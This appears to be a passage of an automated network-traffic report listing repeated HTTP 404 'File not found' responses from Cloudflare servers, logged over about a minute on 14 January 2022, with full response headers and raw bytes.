                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:03 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sVSQx7JSh5kkI06QpSl7v55J7KKqO9lFEn2iMRzg6%2BUOeU%2Fy3Aq6IG5kV1FHqakiZzz4EicIyOGG8RnMuqxDZLPypqcmJO2U0hc%2B2zZd%2BwmLacxzYdzWPgrdjk1f"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7319aed0d8bf3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:05 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rV3S9lOgi8z1FfYbFIHzMOM6aDgwG5U6YR15jhb38BDbjcsPQLIBWG6uxn0vl%2BLFkOwnqhPhVHiE5J91GO215rZ%2B49bV5mb%2FFIVHhPTM2BvhV3YC96lKRa6xigXA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731a40ef5695b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:06 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M6pCooKyP1ogsWi7vXjAPUvz6pO8KFflAkgCXcVje77%2BRl%2BCrMNWz04vzD9V56Bgb3opkx4MKrUFcyLnJD3GtGJoxdzG2BnCib2blh023Qa%2FXk9sFw0dS8Ngjnj9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731b06cf6b787-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:08 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LdEYtIthMhRiRyTxJferZj3fyklSP6%2FZg3xS2f6sYT45iOUxDIiJcy%2BakoBX0c4%2FzVEOjpZ7B0OUN%2F2JYaOsI5MQ2y1kmF4Vtg1jsz4qgqZxeSukFFtc6EDz76yb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731ba1b04694c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:11 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mves1NIsqvGBXag2QTG5swHj6IlRSm5idrymSWQcEoWrRdDvxa1bU8fIDEM%2B%2F0Z%2FRrcnEFFneKoJmx5%2BnUrNE82UB4%2BF3K81ufWM%2FBCxwyea3ilLxKIlui3%2FCA0a"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731cb59cf7181-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:12 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKQFJy%2By3rfUww7H7Z%2BsceGDYiXyes8NRxtLSASqGUrKVcLsCy6QO%2BCNYQcm%2F4NH0wZEcVTX2Rad3zKZ1EvHomshSA2wXNg1jaMeWVZVrtiWw2h4fxr4hV7sTe8f"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731d6fd6f7a55-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:17 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KwDY2sA65K%2BVOpXcFoqUlqVHUxep0vH05eKs73Kv1HB4q%2FXh%2BNGRJ4J%2BcN5u7Nf28PpbKElf8SNdmcWnlFVtcE3DF9elXbvwVk07pupNLbq%2BdQwXBrSmjDrfUXxt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd731f63a1a4dca-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:21 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fCT4Kj%2BXgMLvYA0ag5GlxdCZDwJR8FXTC4VlXmyGO2K0YkZWUxqaHSMdOq63zoHjrYSu3hEfny9YxZLnlR3rhj9yMwitIrwP7i1tUbjo4Y%2Fi6sB6YSJCJRSUEXjN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7320fb9c67163-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:26 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1lPu08ijR8xqa%2FLRHGm%2FgAv947c3opROPlGooJmrtx7LP15TbJ3lgpeEu51NzV1flv5m7EATqHr4fm9P9qcGIHysPEpKkBR32vSDO71PxNWyoQJR7A9z66HLmxRj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7322c4c2b5c56-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:31 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ne8o3Wm34pLjW7KScqi7R56w7QyjrCCugLyQyqTwFr2nLSqTFtyo5FDMWiKRP9lKBYPJIp1Lb7201a4Np8LJvBesvoOsOSPqMvz8ALSAUYxNLRuTuiARd4ibfIyz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7324f3eb0535d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:35 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YnNEu%2B6zItX8IuIFpB3sX2430elU53UrcTDd4MzS5ywAw2%2Bh1c01vrlSa%2FhDCOcVpguSWeBGhE1od9kKJ5vm8avvGcxQRQwQU9DAhDfTg1B1p4SzmIyCwn8BSVN5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732672dd67180-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:38 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=frcFsmSz9eLqp1DVxZWeJnvDypshx0cW2P0qlZGlTrsrLXaIoz0G%2BUP%2FyIe6wetkvr7ZoLRncTcJ22FjnhUX6tqAQTm2xhPfBhp8%2FuYV9PGEfVL%2Bt%2BqwpNxz6982"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732752f244c9d-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:39 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jORwfqXwFNxbmuKpe1R4pl8NbU7SCIWP814sCA3hPWQtfh97B%2BsfQvWZoVwl2lWmOTLBHSHR2W%2FxyqfUg6QTVB%2FEctzuq0xtpO%2FDcypOAtH%2Fbj7wZ%2Bz1HHS9Q1zq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7327ddf314eaa-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:40 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD%2BD4Yze0VxTUApbR%2FxDZT2TQa5Vv4HyOq%2F0Rt4v0bpp8b21wzq782ujo1YzcVWKBDUpsBDq%2FJP9L3ByJREkkxSg3Xc49BlegLmVh5zlLqqKHYK76WyeRPG0Rk8Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732873cb88ba5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:42 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDQouFNatucu1zUc25JJAPkbJ1N6rDWgE2bT6YjVtA0fbz8H29yPkNa3sxMkWo7ZsIG7G0NEekBE8pFECxDsiLpfOH62wqFkPeiowfve6Bz20mG7cVtwyx%2Bd8wT3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732929d346b3c-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:44 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L5mYlgtg3aQGX8qOqrc0LG96iYrZrjxPE93XWHiRGb2UO8OPopN4lmqKPrppc4VVrG05n0SPP5uN%2FWjhWPcfP%2FKo9wNQv0uUo4Peo74KPoQcIBKTXGkgHQY0yyli"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7329f18bf690a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:46 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dwmEdRgcgf0kvMZr2Lz2qxaww4m7Bp1zNcvjkZPkae7eYPGOGJxOL0H57k4VVIcB15BMq8FyBeMDB65ABBamOyFxw%2Bd4IxorIxQDJ0%2F9FWkOm53tftDmS0DhJQsu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732a97fe88beb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:47 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZPNXWJmybJVMKYjkYgMAxW3c9LSQ8wQMUCSc19bMi6DnrXNKlwA1s7u%2FYNvo0V75U%2FwRMZHTKFmwun0xDtghg2%2B1wA4G4hXLZ%2Bb63CM27PW7sOQHFrz3dnno0gYF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732b2de377174-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:49 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xoFPXs5ALdR5jISBg1Ki%2FNXGFl5I7RRePzEtwTG4bbdLmX0iHthiTGIy8wLJKk8rkq4%2FgYJS6HPoUEGyBHubNGNKOfBFZ6TA17%2FlurY7oocN1jNF226ItMo3Mkhn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732bc29a56931-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:50 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tRFYLDQVTkNoruezpRqwrYCrjMFPn0m697vbSgmdJPWynf6cXuF%2FviNjUAT8Hw0xv7diJXMOGqcLHKg%2FNSdva4tbLI6iK26N43D5XYc7z7WraDr7gshT7%2BMKdtG%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732c58ea97a48-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:52 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MUnDKqmoP7BU4JPHDXvMuugC6IO3ewywew4l6Prxk9X7OEiPHWvkcLNcyPLiMP8v7sNsRcXbrfN0vEKUoXGUN9aiORNxADYIhvWD6R4flqV885skSjlfOUIbBUM7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732cfae5d716f-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:55 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hzicuxcnLS%2BMSkxKEskQQ5ceYQwxf%2FKC9qRPX8yZUNsQh9J0T4gIIyd97oKhSjkzyTMKl2YXdbi5v0lrZ7b18fMHewRGbVJ0Wjb5lDvO5ayjdQGvf7%2FpRVsVwhS9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732e30efa7172-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:57 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XNcySB%2BbH3AlRFOnjj9W1p%2BcWCYvOmEOPZE91yl%2BQs4vEIARciS4OzS%2BKPIxDXjyy8%2FWE7gszATruy9u%2FyoVu1PB1yYackPwk8DIjyvtqKhGhmkhqmg9mUxBbgZh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732ecbda2ede7-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:26:58 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WM4ASNvB4Ln0mNPyiiswINBAUmCLMcLm7roMUI%2BcIujOneXrI%2FKRd43s93wQ8c%2FwVzciUxQtYBhz1jRJQY%2BVhPWwcjW800JR784SfxAs3n%2FE2DGjUn3cVcEme%2BHb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd732f61b2b7162-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:01 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g%2FS2%2FuaMIIInUhKJ%2FYgHpAz6SEX4fj37USrarJYEybNdUCyRtnUeb6TQ09Bz4zHLa5%2FAB4CIvYVxMzS5cqOZoPSkmNC%2BVKvjHxFhinfRM%2B7EsXuJJa2TMFf3MGtz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd733098af14e1a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:03 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zj5vKlV7qYaOg04ZKRfbma5DOQVCwdGd3IYqY12U9yAaHhQwg%2FlnW2MIKnT%2FdGHkKU2kiAzE%2BGQKDKmgfZE5LK7WyX1jnX6iDe7JVPTew4gBvZNgP42ICMRdAv8w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73315c8c0c4a4-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:05 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6x%2BsZ007hK5hXMzMkvOiFpCThqx6wq4gq06N1P7L%2BQIcdoieDzOMZjwoob4qVVsan3LoPovO6PokmNui%2FkXbLMf5dphqX6N7W%2FYnA5likl%2BQANj%2Fq%2FECIJTUQq7M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd733225c0b5b98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:08 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K4YnnLQtqyJuefNYYKikgzJrngap6sTAVTPPvew1P%2F7Oa%2Bf6vZF%2BW%2FV08Oo8cjXWmDEFIOnUO2lRRyCE%2FL4ECn2ClYktiFCuu7PnRzjrzvX46B0krV30HPYF7Xdt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd73334ad414a73-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:10 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z6s77jzji2vfKUYleFFTMqFAUQZaKVh7kFWBEXUKoNj9Y6WH%2Fa5s5xL%2Bp5gUW7GoCLj28Ivg7OYZPP%2FVub3llgRwmwyFPtrnaiLVUSmfFMt47erpCDstVXJr7ifb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7333f3fd25c74-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:11 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N1%2BDMtyMNg2FgxsUNKVqRu0%2BBqCdVjMXRahhw7AAfGBzwp76HOkFt68cc7qsVxNZul6jdbraWpy0GeEjheLCMjrZVh5xt9SYpgkrH%2BtVw019nUJ4OXA9rWCB4HOo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd733497d378bd5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
